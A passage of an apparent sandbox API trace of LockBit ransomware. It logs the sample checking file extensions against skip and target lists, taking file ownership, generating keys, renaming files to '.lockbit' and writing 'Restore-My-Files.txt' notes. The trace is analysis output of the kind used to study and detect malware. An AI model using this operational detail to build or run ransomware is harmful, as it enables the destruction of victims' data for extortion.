lstrcmpiW (lpString1=".dbt", lpString2=".wmv") returned -1 [0088.784] lstrcmpiW (lpString1=".dbv", lpString2=".wmv") returned -1 [0088.784] lstrcmpiW (lpString1=".frm", lpString2=".wmv") returned -1 [0088.784] lstrcmpiW (lpString1=".mdf", lpString2=".wmv") returned -1 [0088.784] lstrcmpiW (lpString1=".mrg", lpString2=".wmv") returned -1 [0088.784] lstrcmpiW (lpString1=".mwb", lpString2=".wmv") returned -1 [0088.784] lstrcmpiW (lpString1=".myd", lpString2=".wmv") returned -1 [0088.784] lstrcmpiW (lpString1=".ndf", lpString2=".wmv") returned -1 [0088.784] lstrcmpiW (lpString1=".qry", lpString2=".wmv") returned -1 [0088.784] lstrcmpiW (lpString1=".sdb", lpString2=".wmv") returned -1 [0088.784] lstrcmpiW (lpString1=".sdf", lpString2=".wmv") returned -1 [0088.784] lstrcmpiW (lpString1=".sql", lpString2=".wmv") returned -1 [0088.784] lstrcmpiW (lpString1=".sqlite", lpString2=".wmv") returned -1 [0088.784] lstrcmpiW (lpString1=".sqlite3", lpString2=".wmv") returned -1 [0088.784] lstrcmpiW (lpString1=".sqlitedb", lpString2=".wmv") returned -1 [0088.784] lstrcmpiW (lpString1=".tmd", lpString2=".wmv") returned -1 [0088.784] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground.wmv.lockbit") returned 84 [0088.784] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmainbackground.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0088.795] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0088.795] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0088.795] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0088.796] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0088.796] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0088.796] RtlFreeAnsiString (AnsiString="\\") [0088.796] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3c0) returned 0x0 [0088.796] malloc (_Size=0x200) returned 0x77d800 [0088.796] NtQueryInformationToken (in: TokenHandle=0x3c0, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0088.796] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0088.796] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0088.796] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground.wmv", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0088.797] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground.wmv", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0088.797] CloseHandle (hObject=0x3c0) returned 1 [0088.797] free (_Block=0x77d800) [0088.797] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmainbackground.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c0 [0088.798] CreateIoCompletionPort (FileHandle=0x3c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0088.798] malloc (_Size=0x40068) returned 0x2031ed0 [0088.799] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0x2031ee8 | out: lpFileSize=0x2031ee8*=5477696) returned 1 [0088.799] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0088.799] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0088.800] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2071f04, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2071f04) returned 0x0 [0088.800] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0088.800] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0088.800] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2071f14, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2071f14) returned 0x0 [0088.800] ReadFile (in: hFile=0x3c0, lpBuffer=0x2031f04, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x2031ed0 | out: lpBuffer=0x2031f04*, lpNumberOfBytesRead=0x0, lpOverlapped=0x2031ed0) returned 1 [0089.368] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground.wmv.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground.wmv.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0089.368] malloc (_Size=0xbe) returned 0x77d800 [0089.368] NtSetInformationFile (FileHandle=0x3c0, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xbe, FileInformationClass=0xa) returned 0x0 [0089.369] free (_Block=0x77d800) [0089.369] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground.wmv" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports") returned 1 [0089.369] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\Restore-My-Files.txt") returned 72 [0089.369] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0089.369] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71aa8ea9, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71aa8ea9, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x502ae81f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x57bbc0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SportsMainBackground_PAL.wmv", cAlternateFileName="")) returned 1 [0089.369] lstrcmpiW (lpString1=".", lpString2="SportsMainBackground_PAL.wmv") returned -1 [0089.369] lstrcmpiW (lpString1="..", lpString2="SportsMainBackground_PAL.wmv") returned -1 [0089.369] PathFindExtensionW (pszPath="SportsMainBackground_PAL.wmv") returned=".wmv" [0089.369] lstrcmpiW (lpString1=".386", lpString2=".wmv") returned -1 [0089.370] lstrcmpiW (lpString1=".cmd", lpString2=".wmv") returned -1 [0089.370] lstrcmpiW (lpString1=".exe", lpString2=".wmv") returned -1 [0089.370] lstrcmpiW (lpString1=".ani", lpString2=".wmv") returned -1 [0089.370] lstrcmpiW (lpString1=".adv", lpString2=".wmv") returned -1 [0089.370] lstrcmpiW (lpString1=".theme", lpString2=".wmv") returned -1 [0089.370] lstrcmpiW (lpString1=".msi", lpString2=".wmv") returned -1 [0089.370] lstrcmpiW (lpString1=".msp", lpString2=".wmv") returned -1 [0089.370] lstrcmpiW (lpString1=".com", lpString2=".wmv") returned -1 [0089.370] lstrcmpiW (lpString1=".diagpkg", lpString2=".wmv") returned -1 [0089.370] lstrcmpiW (lpString1=".nls", lpString2=".wmv") returned -1 [0089.370] lstrcmpiW (lpString1=".diagcab", lpString2=".wmv") returned -1 [0089.370] lstrcmpiW (lpString1=".lock", lpString2=".wmv") returned -1 [0089.370] lstrcmpiW (lpString1=".ocx", lpString2=".wmv") returned -1 [0089.370] lstrcmpiW (lpString1=".mpa", lpString2=".wmv") returned -1 [0089.370] lstrcmpiW (lpString1=".cpl", lpString2=".wmv") returned -1 [0089.370] lstrcmpiW (lpString1=".mod", lpString2=".wmv") returned -1 [0089.370] lstrcmpiW (lpString1=".hta", lpString2=".wmv") returned -1 [0089.370] lstrcmpiW (lpString1=".icns", lpString2=".wmv") returned -1 [0089.370] lstrcmpiW (lpString1=".prf", lpString2=".wmv") returned -1 [0089.371] lstrcmpiW (lpString1=".rtp", lpString2=".wmv") returned -1 [0089.371] lstrcmpiW (lpString1=".diagcfg", lpString2=".wmv") returned -1 [0089.371] lstrcmpiW (lpString1=".msstyles", lpString2=".wmv") returned -1 [0089.371] lstrcmpiW (lpString1=".bin", lpString2=".wmv") returned -1 [0089.371] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0089.371] lstrcmpiW (lpString1=".shs", lpString2=".wmv") returned -1 [0089.371] lstrcmpiW (lpString1=".drv", lpString2=".wmv") returned -1 [0089.371] lstrcmpiW (lpString1=".wpx", lpString2=".wmv") returned 1 [0089.371] lstrcmpiW (lpString1=".bat", lpString2=".wmv") returned -1 [0089.371] lstrcmpiW (lpString1=".rom", lpString2=".wmv") returned -1 [0089.371] lstrcmpiW (lpString1=".msc", lpString2=".wmv") returned -1 [0089.371] lstrcmpiW (lpString1=".spl", lpString2=".wmv") returned -1 [0089.371] lstrcmpiW (lpString1=".ps1", lpString2=".wmv") returned -1 [0089.371] lstrcmpiW (lpString1=".msu", lpString2=".wmv") returned -1 [0089.371] lstrcmpiW (lpString1=".ics", lpString2=".wmv") returned -1 [0089.371] lstrcmpiW (lpString1=".key", lpString2=".wmv") returned -1 [0089.371] lstrcmpiW (lpString1=".mp3", lpString2=".wmv") returned -1 [0089.371] lstrcmpiW (lpString1=".reg", lpString2=".wmv") returned -1 [0089.371] lstrcmpiW (lpString1=".dll", lpString2=".wmv") returned -1 [0089.372] lstrcmpiW (lpString1=".ini", lpString2=".wmv") returned -1 [0089.372] lstrcmpiW (lpString1=".idx", lpString2=".wmv") returned -1 [0089.372] lstrcmpiW (lpString1=".sys", lpString2=".wmv") returned -1 [0089.372] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0089.372] lstrcmpiW (lpString1=".ico", lpString2=".wmv") returned -1 [0089.372] lstrcmpiW (lpString1=".lnk", lpString2=".wmv") returned -1 [0089.372] lstrcmpiW (lpString1=".rdp", lpString2=".wmv") returned -1 [0089.372] lstrcmpiW (lpString1=".lockbit", lpString2=".wmv") returned -1 [0089.372] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SportsMainBackground_PAL.wmv") returned -1 [0089.372] lstrcmpiW (lpString1="ntldr", lpString2="SportsMainBackground_PAL.wmv") returned -1 [0089.372] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SportsMainBackground_PAL.wmv") returned -1 [0089.372] lstrcmpiW (lpString1="bootsect.bak", lpString2="SportsMainBackground_PAL.wmv") returned -1 [0089.372] lstrcmpiW (lpString1="autorun.inf", lpString2="SportsMainBackground_PAL.wmv") returned -1 [0089.372] lstrcmpiW (lpString1="thumbs.db", lpString2="SportsMainBackground_PAL.wmv") returned 1 [0089.372] lstrcmpiW (lpString1="iconcache.db", lpString2="SportsMainBackground_PAL.wmv") returned -1 [0089.372] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\") returned="" [0089.372] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground_PAL.wmv") returned=".wmv" [0089.372] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0089.373] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0089.373] lstrcmpiW (lpString1=".7z", lpString2=".wmv") returned -1 [0089.373] lstrcmpiW (lpString1=".ckp", lpString2=".wmv") returned -1 [0089.373] lstrcmpiW (lpString1=".dacpac", lpString2=".wmv") returned -1 [0089.373] lstrcmpiW (lpString1=".db", lpString2=".wmv") returned -1 [0089.373] lstrcmpiW (lpString1=".db-shm", lpString2=".wmv") returned -1 [0089.373] lstrcmpiW (lpString1=".db-wal", lpString2=".wmv") returned -1 [0089.373] lstrcmpiW (lpString1=".db3", lpString2=".wmv") returned -1 [0089.373] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0089.373] lstrcmpiW (lpString1=".dbc", lpString2=".wmv") returned -1 [0089.373] lstrcmpiW (lpString1=".dbs", lpString2=".wmv") returned -1 [0089.373] lstrcmpiW (lpString1=".dbt", lpString2=".wmv") returned -1 [0089.373] lstrcmpiW (lpString1=".dbv", lpString2=".wmv") returned -1 [0089.373] lstrcmpiW (lpString1=".frm", lpString2=".wmv") returned -1 [0089.373] lstrcmpiW (lpString1=".mdf", lpString2=".wmv") returned -1 [0089.373] lstrcmpiW (lpString1=".mrg", lpString2=".wmv") returned -1 [0089.373] lstrcmpiW (lpString1=".mwb", lpString2=".wmv") returned -1 [0089.373] lstrcmpiW (lpString1=".myd", lpString2=".wmv") returned -1 [0089.373] lstrcmpiW (lpString1=".ndf", lpString2=".wmv") returned -1 [0089.374] lstrcmpiW (lpString1=".qry", lpString2=".wmv") returned -1 [0089.374] lstrcmpiW (lpString1=".sdb", lpString2=".wmv") returned -1 [0089.374] lstrcmpiW (lpString1=".sdf", lpString2=".wmv") returned -1 [0089.374] lstrcmpiW (lpString1=".sql", lpString2=".wmv") returned -1 [0089.374] lstrcmpiW (lpString1=".sqlite", lpString2=".wmv") returned -1 [0089.374] lstrcmpiW (lpString1=".sqlite3", lpString2=".wmv") returned -1 [0089.374] lstrcmpiW (lpString1=".sqlitedb", lpString2=".wmv") returned -1 [0089.374] lstrcmpiW (lpString1=".tmd", lpString2=".wmv") returned -1 [0089.374] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground_PAL.wmv.lockbit") returned 88 [0089.374] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmainbackground_pal.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0089.375] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0089.866] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0089.866] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0089.867] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0089.867] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0089.867] RtlFreeAnsiString (AnsiString="\\") [0089.867] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3b8) returned 0x0 [0089.867] malloc (_Size=0x200) returned 0x77d800 [0089.867] NtQueryInformationToken (in: TokenHandle=0x3b8, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0089.867] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0089.867] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0089.867] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground_PAL.wmv", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0089.868] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground_PAL.wmv", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0089.869] CloseHandle (hObject=0x3b8) returned 1 [0089.869] free (_Block=0x77d800) [0089.869] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmainbackground_pal.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b8 [0089.869] CreateIoCompletionPort (FileHandle=0x3b8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0089.869] malloc (_Size=0x40068) returned 0x1ff1e60 [0089.869] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=5749696) returned 1 [0089.869] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0089.870] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0089.870] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0089.870] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0089.870] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0089.870] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0089.870] ReadFile (in: hFile=0x3b8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0089.977] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground_PAL.wmv.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground_PAL.wmv.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0089.977] malloc (_Size=0xc6) returned 0x1fb20c0 [0089.977] NtSetInformationFile (FileHandle=0x3b8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fb20c0, Length=0xc6, FileInformationClass=0xa) returned 0x0 [0089.978] free (_Block=0x1fb20c0) [0089.978] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground_PAL.wmv" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports") returned 1 [0089.978] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\Restore-My-Files.txt") returned 72 [0089.978] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0089.978] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71c25c4b, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71c25c4b, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x50320c39, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1beae6, dwReserved0=0x0, dwReserved1=0x0, cFileName="SportsMainToNotesBackground.wmv", cAlternateFileName="")) returned 1 [0089.979] lstrcmpiW (lpString1=".", lpString2="SportsMainToNotesBackground.wmv") returned -1 [0089.979] lstrcmpiW (lpString1="..", lpString2="SportsMainToNotesBackground.wmv") returned -1 [0089.979] PathFindExtensionW (pszPath="SportsMainToNotesBackground.wmv") returned=".wmv" [0089.979] lstrcmpiW (lpString1=".386", lpString2=".wmv") returned -1 [0089.979] lstrcmpiW (lpString1=".cmd", lpString2=".wmv") returned -1 [0089.979] lstrcmpiW (lpString1=".exe", lpString2=".wmv") returned -1 [0089.979] lstrcmpiW (lpString1=".ani", lpString2=".wmv") returned -1 [0089.979] lstrcmpiW (lpString1=".adv", lpString2=".wmv") returned -1 [0089.979] lstrcmpiW (lpString1=".theme", lpString2=".wmv") returned -1 [0089.979] lstrcmpiW (lpString1=".msi", lpString2=".wmv") returned -1 [0089.979] lstrcmpiW (lpString1=".msp", lpString2=".wmv") returned -1 [0089.979] lstrcmpiW (lpString1=".com", lpString2=".wmv") returned -1 [0089.979] lstrcmpiW (lpString1=".diagpkg", lpString2=".wmv") returned -1 [0089.979] lstrcmpiW (lpString1=".nls", lpString2=".wmv") returned -1 [0089.979] lstrcmpiW (lpString1=".diagcab", lpString2=".wmv") returned -1 [0089.979] lstrcmpiW (lpString1=".lock", lpString2=".wmv") returned -1 [0089.979] lstrcmpiW (lpString1=".ocx", lpString2=".wmv") returned -1 [0089.979] lstrcmpiW (lpString1=".mpa", lpString2=".wmv") returned -1 [0089.979] lstrcmpiW (lpString1=".cpl", lpString2=".wmv") returned -1 [0089.979] lstrcmpiW (lpString1=".mod", lpString2=".wmv") returned -1 [0089.979] lstrcmpiW (lpString1=".hta", lpString2=".wmv") returned -1 [0089.979] lstrcmpiW (lpString1=".icns", lpString2=".wmv") returned -1 [0089.980] lstrcmpiW (lpString1=".prf", lpString2=".wmv") returned -1 [0089.980] lstrcmpiW (lpString1=".rtp", lpString2=".wmv") returned -1 [0089.980] lstrcmpiW (lpString1=".diagcfg", lpString2=".wmv") returned -1 [0089.980] lstrcmpiW (lpString1=".msstyles", lpString2=".wmv") returned -1 [0089.980] lstrcmpiW (lpString1=".bin", lpString2=".wmv") returned -1 [0089.980] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0089.980] lstrcmpiW (lpString1=".shs", lpString2=".wmv") returned -1 [0089.980] lstrcmpiW (lpString1=".drv", lpString2=".wmv") returned -1 [0089.980] lstrcmpiW (lpString1=".wpx", lpString2=".wmv") returned 1 [0089.980] lstrcmpiW (lpString1=".bat", lpString2=".wmv") returned -1 [0089.980] lstrcmpiW (lpString1=".rom", lpString2=".wmv") returned -1 [0089.980] lstrcmpiW (lpString1=".msc", lpString2=".wmv") returned -1 [0089.980] lstrcmpiW (lpString1=".spl", lpString2=".wmv") returned -1 [0089.980] lstrcmpiW (lpString1=".ps1", lpString2=".wmv") returned -1 [0089.980] lstrcmpiW (lpString1=".msu", lpString2=".wmv") returned -1 [0089.980] lstrcmpiW (lpString1=".ics", lpString2=".wmv") returned -1 [0089.980] lstrcmpiW (lpString1=".key", lpString2=".wmv") returned -1 [0089.980] lstrcmpiW (lpString1=".mp3", lpString2=".wmv") returned -1 [0089.980] lstrcmpiW (lpString1=".reg", lpString2=".wmv") returned -1 [0089.980] lstrcmpiW (lpString1=".dll", lpString2=".wmv") returned -1 [0089.980] lstrcmpiW (lpString1=".ini", lpString2=".wmv") returned -1 [0089.980] lstrcmpiW (lpString1=".idx", lpString2=".wmv") returned -1 [0089.981] lstrcmpiW (lpString1=".sys", lpString2=".wmv") returned -1 [0089.981] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0089.981] lstrcmpiW (lpString1=".ico", lpString2=".wmv") returned -1 [0089.981] lstrcmpiW (lpString1=".lnk", lpString2=".wmv") returned -1 [0089.981] lstrcmpiW (lpString1=".rdp", lpString2=".wmv") returned -1 [0089.981] lstrcmpiW (lpString1=".lockbit", lpString2=".wmv") returned -1 [0089.981] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SportsMainToNotesBackground.wmv") returned -1 [0089.981] lstrcmpiW (lpString1="ntldr", lpString2="SportsMainToNotesBackground.wmv") returned -1 [0089.981] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SportsMainToNotesBackground.wmv") returned -1 [0089.981] lstrcmpiW (lpString1="bootsect.bak", lpString2="SportsMainToNotesBackground.wmv") returned -1 [0089.981] lstrcmpiW (lpString1="autorun.inf", lpString2="SportsMainToNotesBackground.wmv") returned -1 [0089.981] lstrcmpiW (lpString1="thumbs.db", lpString2="SportsMainToNotesBackground.wmv") returned 1 [0089.981] lstrcmpiW (lpString1="iconcache.db", lpString2="SportsMainToNotesBackground.wmv") returned -1 [0089.981] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\") returned="" [0089.981] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground.wmv") returned=".wmv" [0089.981] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0089.981] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0089.981] lstrcmpiW (lpString1=".7z", lpString2=".wmv") returned -1 [0089.981] lstrcmpiW (lpString1=".ckp", lpString2=".wmv") returned -1 [0089.981] lstrcmpiW (lpString1=".dacpac", lpString2=".wmv") returned -1 [0089.981] lstrcmpiW (lpString1=".db", lpString2=".wmv") returned -1 [0089.981] lstrcmpiW (lpString1=".db-shm", lpString2=".wmv") returned -1 [0089.981] lstrcmpiW (lpString1=".db-wal", lpString2=".wmv") returned -1 [0089.982] lstrcmpiW (lpString1=".db3", lpString2=".wmv") returned -1 [0089.982] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0089.982] lstrcmpiW (lpString1=".dbc", lpString2=".wmv") returned -1 [0089.982] lstrcmpiW (lpString1=".dbs", lpString2=".wmv") returned -1 [0089.982] lstrcmpiW (lpString1=".dbt", lpString2=".wmv") returned -1 [0089.982] lstrcmpiW (lpString1=".dbv", lpString2=".wmv") returned -1 [0089.982] lstrcmpiW (lpString1=".frm", lpString2=".wmv") returned -1 [0089.982] lstrcmpiW (lpString1=".mdf", lpString2=".wmv") returned -1 [0089.982] lstrcmpiW (lpString1=".mrg", lpString2=".wmv") returned -1 [0089.982] lstrcmpiW (lpString1=".mwb", lpString2=".wmv") returned -1 [0089.982] lstrcmpiW (lpString1=".myd", lpString2=".wmv") returned -1 [0089.982] lstrcmpiW (lpString1=".ndf", lpString2=".wmv") returned -1 [0089.982] lstrcmpiW (lpString1=".qry", lpString2=".wmv") returned -1 [0089.982] lstrcmpiW (lpString1=".sdb", lpString2=".wmv") returned -1 [0089.982] lstrcmpiW (lpString1=".sdf", lpString2=".wmv") returned -1 [0089.982] lstrcmpiW (lpString1=".sql", lpString2=".wmv") returned -1 [0089.982] lstrcmpiW (lpString1=".sqlite", lpString2=".wmv") returned -1 [0089.982] lstrcmpiW (lpString1=".sqlite3", lpString2=".wmv") returned -1 [0089.982] lstrcmpiW (lpString1=".sqlitedb", 